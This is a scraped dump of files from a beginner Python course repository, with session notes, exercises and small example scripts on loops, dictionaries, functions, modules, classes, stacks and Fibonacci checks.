Enabling/Disabling extensions\n```bash\n$ jupyter nbextension enable codefolding/main\n```\n" }, { "alpha_fraction": 0.5589606761932373, "alphanum_fraction": 0.6092604994773865, "avg_line_length": 17.193939208984375, "blob_id": "0921872f7e9186e32b04b2953742e60dd361a5cd", "content_id": "16f6f848de71b5e5566330f2768f25239ebb83c1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3002, "license_type": "no_license", "max_line_length": 111, "num_lines": 165, "path": "/Session1/README.md", "repo_name": "kkasra12/pythonClass981", "src_encoding": "UTF-8", "text": "# second Session\n\n# if - elif - else\n\nthe overall syntax is:\n```python\nif <condition0>:\n # some code goes here using proper indentation\nelif <condition1>:\n # some other code goes here\n # these codes will execute if ( ~condition0 & condition1 )\nelif <condition2>:\n # some other code goes here\n # these codes will execute if ( ~condition0 & ~condition1 & condition2 )\nelse:\n # some other code goes here\n # these codes will execute if all conditions was not true\n```\n\n## forLoop\n\noverall syntax is\n```python\nfor <var> in <iterable>:\n loop-body\n# for example:\nfor i in [1,2,3,4]:\n print(2*i)\n```\nOUTPUT:\n```\n2\n4\n6\n8\n```\n### question: print 0 to 100 ???\n```python\nfor i in range(0,100):\n print(i)\n```\n\n### question: print Fibonacci\nask a user for a number and print Fibonacci series up to that number\nFibonacci series is:\n> a[n]=a[n-1]+a[n-2]\n>\n> 1,1,2,3,5,8,13,...\n\n```python\nn=int(input())\nfib=[1,1]\nfor i in range(2,n):\n fib=fib+[fib[i-1]+fib[i-2]]\n print(fib[i],end=\" \")\nprint()\n```\n\n## break - continue - for else\nthink of a given list as `lst` print 1/x for each x in lst if x!=0 and ignore all members after a `None` member\n\n> what is None?\n>\n> None is a data that points to nothing :)\n\n```python\nlst=[1,3,4,6,8,0,None,4,5,5,3]\nans=[]\nfor i in lst:\n if i==0:\n continue\n if i==None:\n break\n ans.append(1/i)\nelse:\n print(\"this list has no None items\")\nprint(ans)\n```\n\n## while - loop\n\n### question: ask for numbers from users and sum them up until user types STOP\n\n```python\nsum=0\nwhile True:\n n=input()\n if n==\"STOP\":\n break\n sum+=int(n)\nprint(sum)\n```\n\n### question: ask a number from user and write the each digit in seperate line\n> idea\n>\n> 256=25*10+6\n>\n> 25=2*10+5\n>\n> 2=0*10+2\n\n```python\nlst=[]\nn=int(input())\nwhile n>0:\n lst.append(n%10)\n n//=10.\nprint(lst[::-1])\n```\n\nOR\n\n```python\nn=input()\nfor i in n:\n print(i)\n```\n\nLATER you can say:\n\n```python\nprint(\"\\n\".join([i for i in input()]))\n```\n\n## Dictionary\n\ndictionaries contains a ***key*** and a ***value***\n> TIP: ***key*** must be **hashable**\nthe most usable function of the dictianries is update:\n\nlook at this cammands executed in REPL\n```python\n>>> numbers={1:\"one\",2:\"two\",3:\"three\"}\n>>> print(numbers[1])\none\n>>> print(numbers[3])\nthree\n>>> details={\"name\":\"kasra\",\"age\":22,\"height\":1.8,200:500}\n>>> details['name']\n'kasra'\n>>> details.get(\"name\")\n'kasra'\n>>> details.get(\"namee\")\n>>> details.items()\ndict_items([('name', 'kasra'), ('age', 22), ('height', 1.8), (200, 500)])\n>>> details.pop(\"name\")\n'kasra'\n>>> details\n{'age': 22, 'height': 1.8, 200: 500}\n>>> details.setdefault('age',0)\n22\n>>> details\n{'age': 22, 'height': 1.8, 200: 500}\n>>> details.setdefault('age',0)\n22\n>>> details.setdefault('name','kasraaaaaa')\n'kasraaaaaa'\n>>> details\n{'age': 22, 'height': 1.8, 200: 
500, 'name': 'kasraaaaaa'}\n>>> details.update({\"name\":\"kasra\",\"test\":\"testVal\"})\n\n>>> details\n{'age': 22, 'height': 1.8, 200: 500, 'name': 'kasra', 'test': 'testVal'}\n```\n" }, { "alpha_fraction": 0.7592592835426331, "alphanum_fraction": 0.7592592835426331, "avg_line_length": 26, "blob_id": "06c5404e1ab2b49c60a154b5f7e7c7e2f917bf03", "content_id": "2b87e79771e6972a9156e36ca50c24fbdd9f1d2a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 54, "license_type": "no_license", "max_line_length": 43, "num_lines": 2, "path": "/Session6/README.md", "repo_name": "kkasra12/pythonClass981", "src_encoding": "UTF-8", "text": "# Jupyter\n try installing jupyter for this session :)\n" }, { "alpha_fraction": 0.651067316532135, "alphanum_fraction": 0.6535303592681885, "avg_line_length": 24.375, "blob_id": "da37de60bb958e1b724b961f262789d502147efe", "content_id": "944d5266b9089459133c5e7824b59b125eb90c3e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1218, "license_type": "no_license", "max_line_length": 107, "num_lines": 48, "path": "/Session8/README.md", "repo_name": "kkasra12/pythonClass981", "src_encoding": "UTF-8", "text": "# Class(part2)\n\nlets make an stack...\n\n## a Simple Example\n**lets make a class**\n### what is stack ?\n\n![stack](./stack.jpg)\n\n> TIP: The initial step to make a class is defining its API *(what is API?)*\n\n### API\n\n| function/variable | arguments|returns| description |\n| :-------------: | :-------:| :---:|:--- |\n| push | value:[anytype] | `None` | pushes `value` into stack\npop|-|last item in the stack, `None` if stack is empty | removes the last item in the stack and returns it|\nlastItem|-|last item in the stack|like pop but without removing\nisEmpty|-|`True` or `False`|returns `True` if stack is empty\nsize|-| `int` |returns the number of items stored in the stack\nstr|-|?|?\neq|other stack|?|?\n\n\n**Question**\n\n1. Implement a stack class\n2. describe how to use it in other code\n\n**How to force user not to have access to main data in class?**\n\n### public, private and protected Access Modifiers\n\n**Question**\\\n define terms public, private and protected.\n\n```Python\nclass test:\n \"\"\"docstring for test.\"\"\"\n\n def __init__(self):\n self.public='public' # this is public\n self._protected=\"protected\" # this is protected\n self.__private=\"private\" # this is private\n```\n\n> NOTE: that was all joke!!! 
:)\n" }, { "alpha_fraction": 0.3802816867828369, "alphanum_fraction": 0.4553990662097931, "avg_line_length": 18.363636016845703, "blob_id": "9265e8e1285c13a958b6308c9a840465b3d5fd99", "content_id": "c8f8ea15c73720cfc8e81c1433eb92d38afed595", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 213, "license_type": "no_license", "max_line_length": 37, "num_lines": 11, "path": "/Session7/fastFib/regularFib.py", "repo_name": "kkasra12/pythonClass981", "src_encoding": "UTF-8", "text": "def isFib(num):\n a,b=1,1\n while b<num:\n a,b=b,a+b\n if b==num:\n return True\n return False\n\nif __name__ == '__main__':\n for i in [3,5,11,8,20,50,100,90]:\n print(isFib(i))\n" }, { "alpha_fraction": 0.643147885799408, "alphanum_fraction": 0.685662567615509, "avg_line_length": 29.28767204284668, "blob_id": "a0caec567aca3baabf4438440b71e3fd44bbb2ba", "content_id": "6609bc2af87afe798fbd7169ca71d2bcd8eb2b04", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2211, "license_type": "no_license", "max_line_length": 103, "num_lines": 73, "path": "/Session7/fastFib/speedChecker.py", "repo_name": "kkasra12/pythonClass981", "src_encoding": "UTF-8", "text": "from time import time\nfrom random import randint,gauss\nfrom fastFib import FibMaker\nfrom regularFib import isFib\nfrom collections import Counter\ntry:\n from matplotlib import pyplot as plt\n drawGraph=True\nexcept:\n print('''You dont have matplotlib!!So I cant show any graph...\ntry installing it using:\n $pip install matplotlib''')\n drawGraph=False\n# This is a Fibonacci series chose your constant wiser...\n# 1 2 3 5 8 13 21 34 55 89 144 233 377 610 987 1597 2584 4181 6765 10946 17711 28657 46368 75025 121393\n#\nTEST_SIZE=int(1e7)\nSTART_RANGE=int(1.21e5)\nEND_RANGE=int(1.22e5)\nprint('generating numbers...')\n# numbers=[randint(START_RANGE,END_RANGE) for _ in range(TEST_SIZE)]\nnumbers=[int(gauss((START_RANGE+END_RANGE)/2,(END_RANGE-START_RANGE)/12)) for _ in range(TEST_SIZE)]\nprint('numbers generated...')\nprint(f'''\\tbiggest number generated: {max(numbers)}\n\\tsmallest number generated:{min(numbers)}''')\nif drawGraph:\n numbersDest=Counter(numbers)\n ############this is not good(why?):\n #x=[i[0] for i in numbersDest.items()]\n #y=[i[1] for i in numbersDest.items()]\n ############this is much faster\n x=[]\n y=[]\n for i in numbersDest:\n x.append(i)\n y.append(numbersDest[i])\n print(\"numbers counted...\\nmaking the graph...\")\n plt.bar(x,y)\n plt.show()\nansfastFib=[]\nansreguFib=[]\nprint('...')\nfastFib=FibMaker()\nnow=time()\nfor i in numbers:\n ansfastFib.append(fastFib.isFib(i))\nfastFibTime=time()-now\nprint(f\"time elapsed for fast fib is {fastFibTime}\")\n\nnow=time()\nfor i in numbers:\n ansreguFib.append(isFib(i))\nreguFibTime=time()-now\nprint(f\"time elapsed for fast fib is {reguFibTime}\")\n\nif all([i==j for i,j in zip(ansfastFib,ansreguFib)]):\n print(\"\\tNOTE: all answers match\")\nelse:\n print(\"\\tNOTE: all answers does NOT match\")\n\nansDest=Counter(ansfastFib)\n\n# plt.bar(['True','False'],[ansDest[True],ansDest[False]],yerr=[\"sallaaam\",\"rrrr\"])\nprint(f\"number of mathed items: {ansDest[True]}\\nnumber of unmathed items: {ansDest[False]}\")\n# plt.show()\n\nfig, ax = plt.subplots()\ny=[ansDest[True],ansDest[False]]\nax.bar(['True','False'],y)\nfor index,data in enumerate(y):\n plt.text(index, 10, s=f\"{data}\")\nplt.tight_layout()\nplt.show()\n" }, { "alpha_fraction": 0.4398782253265381, "alphanum_fraction": 
0.48097413778305054, "avg_line_length": 23.33333396911621, "blob_id": "67d29e5734e219040a73018532411338f5628433", "content_id": "a114c74c447d1f2e09d17ad238d67e6b85018ed4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 657, "license_type": "no_license", "max_line_length": 39, "num_lines": 27, "path": "/Session7/fastFib/fastFib.py", "repo_name": "kkasra12/pythonClass981", "src_encoding": "UTF-8", "text": "class FibMaker:\n def __init__(self):\n self.series={1,1}\n self.lastNum0=1\n self.lastNum1=1\n\n def isFib(self,num):\n if num in self.series:\n return True\n if num<self.lastNum1:\n return False\n a,b=self.lastNum0,self.lastNum1\n while b<num:\n a,b=b,a+b\n self.series.add(b)\n if b==num:\n self.lastNum0=a\n self.lastNum1=b\n return True\n self.lastNum0=a\n self.lastNum1=b\n return False\n\nif __name__ == '__main__':\n f=FibMaker()\n for i in [3,5,11,8,20,50,100,90]:\n print(f.isFib(i))\n" }, { "alpha_fraction": 0.4100106358528137, "alphanum_fraction": 0.4739084243774414, "avg_line_length": 14.145161628723145, "blob_id": "bd518ec1447f54d793ce3babb2144451427beb7a", "content_id": "575d991809a898db83e97eb1b64a6bfcc8b5e217", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1878, "license_type": "no_license", "max_line_length": 207, "num_lines": 124, "path": "/Session3/question.md", "repo_name": "kkasra12/pythonClass981", "src_encoding": "UTF-8", "text": "# Question0\nwrite a function which gets a nested list and a number. This function should search the number in the list and returns its place as sequence of indexes, also this function should returns the lists structure.\n\n **input** is a list and a number\\\n **output** must be sequence of indexes pointing to that number and the structure of nested lists.\n\n#### sampleCode\n```python\ndef listShape(lst,n):\n # blub blub blub\n pass\n\nnestedList=[\n [\n [\n [1,2],\n [3,4],\n [5,6]\n ],\n [7,8],\n [9,10,11],\n [12],\n [13,14,15]\n ],\n [\n [16],\n [17,18],\n [19,20,21],\n [\n [22],\n [\n [23,24],\n [25,26,27],\n ],\n [28]\n ],\n [29]\n ],\n [30],\n]\nprint(nestedList,15)\n```\n#### Output\n```python\n[0,4,2],\n[\n 3,\n [5,5,1],\n [\n [3,2,3,1,3],\n [1,2,3,3,1],\n [0]\n ],\n [\n [\n [2,2,2],\n [0,0],\n [0,0,0],\n [0],\n [0,0,0]\n ],\n [\n [0],\n [0,0],\n [0,0,0],\n [1,2,1],\n [0]\n ]\n ],\n [\n [\n [\n [0,0],\n [0,0],\n [0,0]\n ],\n ],\n [\n [\n [0],\n [2,3],\n [0]\n ],\n ]\n ],\n [\n [\n [\n [\n [0,0],\n [0,0,0]\n ],\n ],\n ]\n ],\n]\n```\n\n# Question1\nImplement a function which it can calculate the reverse of another function.\\\nwe know `y=f(x)` where `y` value and `f` function are available. 
Finding `x` is the goal.\n\n**input**\n- first input is a function\n- second one is the `y` value\n- third and fourth values are the range which contains the answer (generally, the whole function range or any sub-range of that)\n\n**output** is `x` for which `y==f(x)` is **True**.\n\n#### sampleCode\n```python\ndef f_inv(f,y,startRange,endRange):\n    # blub blub blub\n    pass\n\n\ng=lambda x: 2*x**2+x\nprint(f_inv(g,g(4.5),0,5))\n```\n#### output\n```\n4.5\n```\nor any number near to `4.5`\n" }, { "alpha_fraction": 0.5610211491584778, "alphanum_fraction": 0.6002490520477295, "avg_line_length": 15.90099048614502, "blob_id": "ab8cd85a5fc3f111f2c3e3d46d4855165ab751b0", "content_id": "a1d738ea4182dea79ff3323a7d0242b609170f93", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1606, "license_type": "no_license", "max_line_length": 128, "num_lines": 101, "path": "/Session1/questions.md", "repo_name": "kkasra12/pythonClass981", "src_encoding": "UTF-8", "text": "## First question\n\nthere are some numbers in the first line\nthese numbers might be the angles of a polygon\nThe question is to write a program to determine whether those angles can form a polygon or not.\n\n#### input0\n> 90 45 45\n\n#### output0\n> YES\n\n#### input1\n> 90 80 100 90\n\n#### output1\n> YES\n\n#### input2\n> 90 80 80 70\n\n#### output2\n> NO\n\n**TIP**: You can split the input value using the `str.split()` function\n```python\n>>> a='kasra eskandari test tmp'\n>>> splitedVal=a.split(' ')\n>>> print(splitedVal)\n['kasra', 'eskandari', 'test', 'tmp']\n```\n\n**TIP**: The sum of the angles in a polygon is `180(n-2)`\n\n## Second question\n\nget an integer number `n` from the user and draw two diamonds with a diameter of `n` using asterisks (or whatever character you like).\n\n#### input0\n> 5\n\n#### output0\n```\n *        *\n ***    ***\n**********\n ***    ***\n *        *\n```\n\n## Third question\n\nask the user for a sentence and count the occurrence of each character.\nprint each character in a separate line and leave a single space between the character and the number\n\n#### input0\n> hello my name is kasra\n\n#### output0\n```\nh 1\ne 2\nl 2\no 1\n  4\nm 2\ny 1\nn 1\na 3\ni 1\ns 2\nk 1\nr 1\n```\n**TIP**: use the logical `in` operator to check if a key is available in a dictionary or not.\n```python\n>>> d={'a':0, 'b':2, 'f':65}\n>>> if 'a' in d:\n...     print(\"YES\")\n...\nYES\n>>> if 'c' in d:\n...     print(\"YES\")\n... else:\n...     print(\"NO\")\n...\nNO\n>>>\n```\n## Fourth question (!!HARD!!)\n\nGet a sequence of numbers from the user and store them in a list ( lets say `a` e.g. 
)\nfind the size of this set\n\n`{(x,y,z) : x<y<z , a[x] < a[y] < a[z] }`\n\n#### input0\n> 1 2 2 3 4\n\n#### output0\n> 6\n" }, { "alpha_fraction": 0.6532846689224243, "alphanum_fraction": 0.6551094651222229, "avg_line_length": 15.606060981750488, "blob_id": "51bfb3b390a01100defa1bdb1a38824b4f049ae7", "content_id": "2296d890cccce09235321839d9a95ecd61c95ac3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1096, "license_type": "no_license", "max_line_length": 116, "num_lines": 66, "path": "/Session2/README.md", "repo_name": "kkasra12/pythonClass981", "src_encoding": "UTF-8", "text": "# List comprehensions\n```python\nmyList=[<expresion> for <var> in <iterable>]\n```\n**is same as**:\n```python\nmyList=[]\nfor <var> in <iterable>:\n myList.append(<expresion>)\n```\n\n#### using if-statement\n```python\n[<expresion> for <var> in <iterable> if <condition>]\n```\n\n#### using if-else-statement\n```python\n[<expresion0> if <condition> else <expresion1> for <var> in <iterable>]\n```\n\n> similar methods are available for `dictionary`,`tuple` and `set`\n\n# Working around strings\n\n## join\n\n**exercise :** print a multiplication table (prefer to use just one print)\n\n> \\t and \\n can be used Tab and newLine\n\n## split\n\n## format\n\n## F-strings\n\n> Strings are immutable\n\n# Built-in function\n\n#### What is function ?\n\n#### How to use function ?\n\n#### abs\n\n#### all,any\n\n**exercise:** write a program to get a adjacency matrix and determine weather it has Eulerian path or cycle or not ?\n\n#### bin, oct, hex\n\n#### chr, ord\n\n#### max, min\n\n#### open\n\n#### zip\n\n#### enumerate\n\n**exercise:** ask the user for two strings and return their hamming distance\n\n> using three ' or \" can make a multi line string.\n" }, { "alpha_fraction": 0.6359060406684875, "alphanum_fraction": 0.6476510167121887, "avg_line_length": 14.684210777282715, "blob_id": "4fd731d649248039f4c1064343094619991fce85", "content_id": "26d92fc16a47007dc7412103e294710c6a747f12", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1788, "license_type": "no_license", "max_line_length": 92, "num_lines": 114, "path": "/Session5/README.md", "repo_name": "kkasra12/pythonClass981", "src_encoding": "UTF-8", "text": "# `os` Module\n\n- os.name\n****\n- os.environ\n- os.getenv()\n- os.putenv()\n****\n- os.chdir()\n- os.getcwd()\n****\n- os.mkdir()\n- os.rmdir()\n****\n- os.remove()\n- os.rename()\n****\n- os.walk()\n```python\nfor root, dirs, files in os.walk(path):\n print(root)\n```\n- os.path\n - basename\n - dirname\n - exists\n - isdir and isfile\n - join\n - split\n\n# `random` Module\n- choice \\\n **Question:** Roll a dice :)\n- choices\\\n **Question:** How to generate a 8 digit random password?\n- randint\\\n **Question:** Roll another dice :))\n- random\\\n **Question:** keep rolling dices :)))\n- shuffle\\\n **Question:** feel free to roll a simple dice :))))\n\n# `time` Module\n- time\n- sleep\n\n# `pickle` Module\n- dump\n- load\n\n```python\nfrom pickle import dump\n\nmyList=[1,2]\n# some codes to populate myList\n# now lets save it to use later\n\nf=open(\"myList\",'wb')\ndump(myList,f)\nf.close()\n```\n\n```python\nfrom pickle import load\nf=open(\"myList\",'rb')\nmyList=load(f)\nprint(myList)\n```\n# More Modules to Read\n- csv\n- datetime\n- urllib2\n- hashlib\n- json\n- smtplib\n\n# How to Install New Modules\n\n\nfirst of all check if you have pip or not\n```bash\n$ pip3 
--version\npip 19.3.1 from /usr/local/lib/python3.6/dist-packages/pip (python 3.6)\n```\n> use `pip` if you have windows\n\n## Install pip\nto install pip, if you already don't have it:\\\n**In UNIX machines:**\n```bash\n$ sudo apt install python3-pip\n```\nor use any other package manager up to your distribution\n\n**In Windows**\n```bash\npython -m pip install pip\n```\n*or:*\n\n1. Download [get-pip.py](https://bootstrap.pypa.io/get-pip.py) to a folder on your computer.\n2. Run that file using python:\n```bash\n$ python get-pip.py\n```\n3. FINISH\n\n## How to Use It\n```bash\n$ pip3 search <package-name>\n$ pip3 install <package-name> --user\n$ pip3 list\n$ pip3 install <package-name> --upgrade\n```\n" }, { "alpha_fraction": 0.6894374489784241, "alphanum_fraction": 0.7078071236610413, "avg_line_length": 28.525423049926758, "blob_id": "a5b650ee2dd6c7154e73d51741a2326ce25d9277", "content_id": "4c1031060d30de7df7a0874e6b2604934d69c9a4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1742, "license_type": "no_license", "max_line_length": 238, "num_lines": 59, "path": "/Session9/README.md", "repo_name": "kkasra12/pythonClass981", "src_encoding": "UTF-8", "text": "# Question0\n\nimplement a bidirectional linked list :)\n\n![](Linkedlist.png)\n**API**\n\n| function/variable | description |\n| :-: |:-\ndata|the data stored in this node\nnext| points to the next node |\nprevious|points to previous node\nadd|adds a node to specific index|\ndelete|deletes current node\nroot| returns the lists root\nlen| -\nstr| -\neq| -\n\n![](Linkedlist_insert_middle.png)\n\n![](Linkedlist_deletion.png)\n\n# Question1\n\nYou are given a node that is the beginning of a linked list. This list always contains a tail and a loop.\n\nYour objective is to determine the length of the loop.\n\nin the following example the tail's size is 3 and the loop size is 11.\n```python\nnodes=[node() for i in range(14)]\nfor node, next_node in enumerate(nodes,nodes[1:]):\n node.next=next_node\nnodes[13].next=nodes[11]\n```\n\n> Use the `next` attribute to get the following node\\\n> `node.next`\n\n> Note: do NOT mutate the nodes!\n\n\n# Question2\n\nA [perfect power](https://en.wikipedia.org/wiki/Perfect_power) is a classification of positive integers:\n\n> In mathematics, a perfect power is a positive integer that can be expressed as an integer power of another positive integer. More formally, `n` is a perfect power if there exist natural numbers `m > 1`, and `k > 1` such that `m**k = n`.\n\nYour task is to check wheter a given integer is a perfect power. If it is a perfect power, return a pair `m` and `k` with `mk = n` as a proof. Otherwise return `None`.\n\n> Note: For a perfect power, there might be several pairs. For example 81 = 3^4 = 9^2, so (3,4) and (9,2) are valid solutions. 
However, the tests take care of this, so if a number is a perfect power, return any pair that proves it.\n\n```\nExamples\nisPP(4) => [2,2]\nisPP(9) => [3,2]\nisPP(5) => None\n```\n" }, { "alpha_fraction": 0.49221453070640564, "alphanum_fraction": 0.49913495779037476, "avg_line_length": 21.568628311157227, "blob_id": "4cfb0fccfcd45e885931f57c9c1ebed263a9a29b", "content_id": "dbe05499e5c6a9b128fdb0d8e0cf1f64fbfee24c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1156, "license_type": "no_license", "max_line_length": 50, "num_lines": 51, "path": "/Session8/stack.py", "repo_name": "kkasra12/pythonClass981", "src_encoding": "UTF-8", "text": "class stack:\n def __init__(self):\n self.values=[]\n def push(self,value):\n self.values.append(value)\n\n\n def pop(self):\n if len(self.values)==0:\n return None\n else:\n return self.values.pop(-1)\n\n def lastItem(self):\n if len(self.values)==0:\n return None\n else:\n return self.values[-1]\n def isEmpty(self):\n if len(self.values)==0:\n return True\n else:\n return False\n def __len__(self):\n return len(self.values)\n def __str__(self):\n return f\"[ {' '.join(self.values)} ]\"\n def __eq__(self,other):\n if type(other)==type(self):\n return self.values==other.values\n raise Exception(\"other type is not stack\")\n\nif __name__ == '__main__':\n s=stack()\n s.push(1)\n s.push(4)\n s.push(6)\n s.push(\"kasra\")\n s.push(\"hellllo\")\n print(s.pop())\n print(s.lastItem())\n print(s.pop())\n print(s.pop())\n print(s.lastItem())\n print(s.pop())\n print(s.pop())\n print(s.pop())\n print(s.pop())\n print(s.lastItem())\n print(s.pop())\n print(s.pop())\n \n" }, { "alpha_fraction": 0.7254518866539001, "alphanum_fraction": 0.7454811930656433, "avg_line_length": 35.53571319580078, "blob_id": "67d59c52838b454a09b669b36e86792f11ccc1dd", "content_id": "4223ab6544284cd5522d4caa8621f5e1ef298b84", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2047, "license_type": "no_license", "max_line_length": 132, "num_lines": 56, "path": "/Session0/session0.md", "repo_name": "kkasra12/pythonClass981", "src_encoding": "UTF-8", "text": "# First Session\n\n## Why python?\n\n1. First and formost ython is FREE.\n2. Python is light ( matlab is about 10-15GB, java ~ 300-500MB, C# ~ 7-8GB, ...).\n3. As python is scripting language it can run on any platform.\n4. Python's data structure are sutable for machine learning and modern programmings.\n5. Python's community is vast.\n6. Python's extending and package manager is very good\n\n## Download and install python\n\n***if your operating system is windows*** then visit [here](python.org) to download your file.\n**dont forget to tick the `add to PATH`**\n\nTo verify your installation open CMD and type `python`, if you where able to see the REPL, then be proud of yourself... :)\n\n***if your operating system is UNIX*** then you might have python already \n> any way to install python u must run `sudo apt install python3` (for debian base distros ONLY)\n\nto verify your posetion of python simply run `python3` in terminal and u will see REPL\n\n***if your operating system is MAC*** \n:|\nCHANGE YOUR OS :|\n\n## Coding environment\n\nto choose a comfortable environment you have several chices:\n1. python's default IDLE(only available at windows):\n if u have installed python u can access this in your start \n myScoreForThisoption: 4/10\n2. 
pycharm IDE: \n    as we know pycharm is NOT free (and this is a big reason to run away...)\n    anyway, if you decide to install pycharm you may face a big load on your RAM, and you may face some problems while installing packages\n    myScoreForThisoption: 2/10\n3. Vscode + python3 interpreter\n    Vscode is a TextEditor, which is available at [here](https://code.visualstudio.com/download)\n    you can edit your text and then run it using the python interpreter\n    or a simpler way is to install the python package in Vscode\n    myScoreForThisoption: 8/10\n4. Atom + python3 interpreter\n    Atom is another textEditor with a WIDE range of amazing tools *__*\n    myScoreForThisoption: 11/10\n \n## Start programming \n\n** yesss lets start programming **\n\n### Variables\n    Variables are dynamically typed in python\n    you don't need to declare their type\n    `a=45` \n\n### \n" }, { "alpha_fraction": 0.6440678238868713, "alphanum_fraction": 0.6847457885742188, "avg_line_length": 21.69230842590332, "blob_id": "1b6ce7ef3474eb86c11635382416ce56a389bf4a", "content_id": "ff4632cc9de0ba07215178a9d905b5375ac9b34a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 295, "license_type": "no_license", "max_line_length": 85, "num_lines": 13, "path": "/Session7/ans.py", "repo_name": "kkasra12/pythonClass981", "src_encoding": "UTF-8", "text": "class human:\n    name=None\n    def __init__(self):\n        print(\"i am new born!!\")\n    def sayHello(self):\n        print(f\"hello ma friend :)\\nMy name is {self.name} I am very polite \\U0001F60C\\n\")\n\nperson0=human()\nperson0.name=\"kasra\"\nperson0.sayHello()\nperson1=human()\nperson1.sayHello()\nperson0.sayHello()\n" }, { "alpha_fraction": 0.6951102614402771, "alphanum_fraction": 0.7516778707504272, "avg_line_length": 29.676469802856445, "blob_id": "8b9126b1ad929e52fa29244a72dde78d8e45c0df", "content_id": "f7178c296cc1979729e389dbc0d6fd5ece085514", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1046, "license_type": "no_license", "max_line_length": 115, "num_lines": 34, "path": "/Session7/fastFib/README.md", "repo_name": "kkasra12/pythonClass981", "src_encoding": "UTF-8", "text": "> this is an answer to the question mentioned in the lesson\n\n\n# Question\n think of a pile of numbers that we should check whether they are in the Fibonacci series or not.\n- **first** most of the numbers are duplicated\n- **second** make it *fast*\n\n> try to solve it on your own before looking at the answers\n\n## Files Description\n- `fastFib.py` is **the main answer** (your answers are welcome if you can make it faster 😉)\n- also I solved this question using a *regular* method, not taking care of time, which is in `regularFib.py`.\n- `speedChecker.py` simply examines the other codes' speed\n\n## Sample Output\n```\ngenerating numbers...\nnumbers generated...\n\tbiggest number generated: 121918\n\tsmallest number generated:121053\nnumbers counted...\nmaking the graph...\nqt5ct: using qt5ct plugin\n...\ntime elapsed for fast fib is 2.676896810531616\ntime elapsed for regular fib is 16.891290426254272\n\tNOTE: all answers match\nnumber of matched items: 20818\nnumber of unmatched items: 9979182\n```\n\n![](./numbers_destribution.png)\n![](./answers_destribution.png)\n" }, { "alpha_fraction": 0.5356707572937012, "alphanum_fraction": 0.5865853428840637, "avg_line_length": 13.513274192810059, "blob_id": "2456fa16bded97b74efaaf50dc84109aba5476de", "content_id": "a251da37d40b006cc1acd2c97b01f307469f845a", "detected_licenses": [], "is_generated": 
false, "is_vendor": false, "language": "Markdown", "length_bytes": 3280, "license_type": "no_license", "max_line_length": 91, "num_lines": 226, "path": "/Session3/README.md", "repo_name": "kkasra12/pythonClass981", "src_encoding": "UTF-8", "text": "# Unpacking lists\n\n```python\n>>> a,b=[1,3]\n>>> a\n1\n>>> b\n3\n>>> print(a,b)\n1 3\n>>> a,b=[1,2,3]\nTraceback (most recent call last):\n File \"<stdin>\", line 1, in <module>\nValueError: too many values to unpack (expected 2)\n>>> a,b,c=[1,2,3]\n>>> print(a,b,c)\n1 2 3\n>>> a,*b=[1,2,3]\n>>> print(a,b)\n1 [2, 3]\n>>> a,*b,c=[1,2,3,4,5,6]\n>>> print(a,b,c)\n1 [2, 3, 4, 5] 6\n```\n\n# defining functions\n\n#### why we need to define new functions ?\n1. Re-usability\n2. Easier to understand\n3. Recursive functions\n4. Abstraction\n5. Team work\n6. Making iterators\n\n```python\ndef <function_name>(<arguments>):\n #\n # function body\n #\n return <output>\n```\n\n**example:** Adder\n```python\ndef adder(a,b):\n return a+b\n```\n\n**example:** XOR two lists\n```python\ndef XOR(list0,list1):\n answer=[]\n for i,j in zip(list0,list1):\n answer.append(i^j)\n return answer\n```\n\n*or...*\n\n```python\ndef XOR(list0,list1):\n return [i^j for i in zip(list0,list1)]\n```\n\n**example:** Absolute value\n```python\ndef absoluteVal(x):\n if x<0:\n x*=-1\n return x\n```\n\n**example:** Fibonacci series\n\n```python\ndef fib(n):\n if n==1 or n==2:\n return 1\n a=1\n b=1\n for i in range(n-2):\n b=a+b\n a=b-a\n return b\n```\n*or...*\n\n```python\ndef fib(n):\n if n==1 or n==2:\n return 1\n a,b=1,1\n for i in range(n-2):\n a,b=b,a+b\n return b\n```\n\n# Variable scope\n\n```python\ndef boo():\n m=3\n\ndef foo(n):\n m=1\n boo()\n print(n,m)\n n=10\n\nm=2\nn=0\nfoo(3)\nprint(n,m)\n```\n\n# Passing arguments\n\n#### Define a default value for a specific variable\n```python\ndef log(num,base=10):\n UPBOUND=10**5\n sum0=0\n k=1\n xn=num-1\n for i in range(1,UPBOUND):\n sum0+=k*xn/i\n k*=-1\n xn*=(num-1)\n sum1=0\n k=1\n xn=base-1\n for i in range(1,UPBOUND):\n sum1+=k*nx/i\n k*=-1\n xn*=base-1\n return sum0/sum1\n\n\nprint(log(20))\nprint(log(100))\nprint(log(64,2))\nprint(log(729,base=2))\n```\n#### Passing multiple arguments as a list\n\n```python\ndef f(*numbers):\n k=1\n s=0\n for i in numbers:\n s+=k*i\n k*=-1\n return s\n\n\nprint(f(1,2,3)) # 1-2+3 = 2\nprint(f(4,5,8,9,10,4)) # 4-5+8-9+10-4 = 4\nprint(f(8,3,2)) # 8-3+2 = 7\n```\n\n**using asterisks while calling function**\n\n```python\ndef curveGenerator(a,b,c,xStart,xEnd,step):\n ''' returns a list containing f(x) values which starts from xStart and end until xEnd\n WHERE:\n f(x) = ax^2+bx+c\n '''\n ans=[]\n x=xStart\n while x<=xEnd: # Line A\n ans.append(a*x**2+b*x+c)\n x+=step\n return ans\n\nprint(curveGenerator(*[1,0,0,-2,2,0.01]))\n```\n**QUESTION**: why 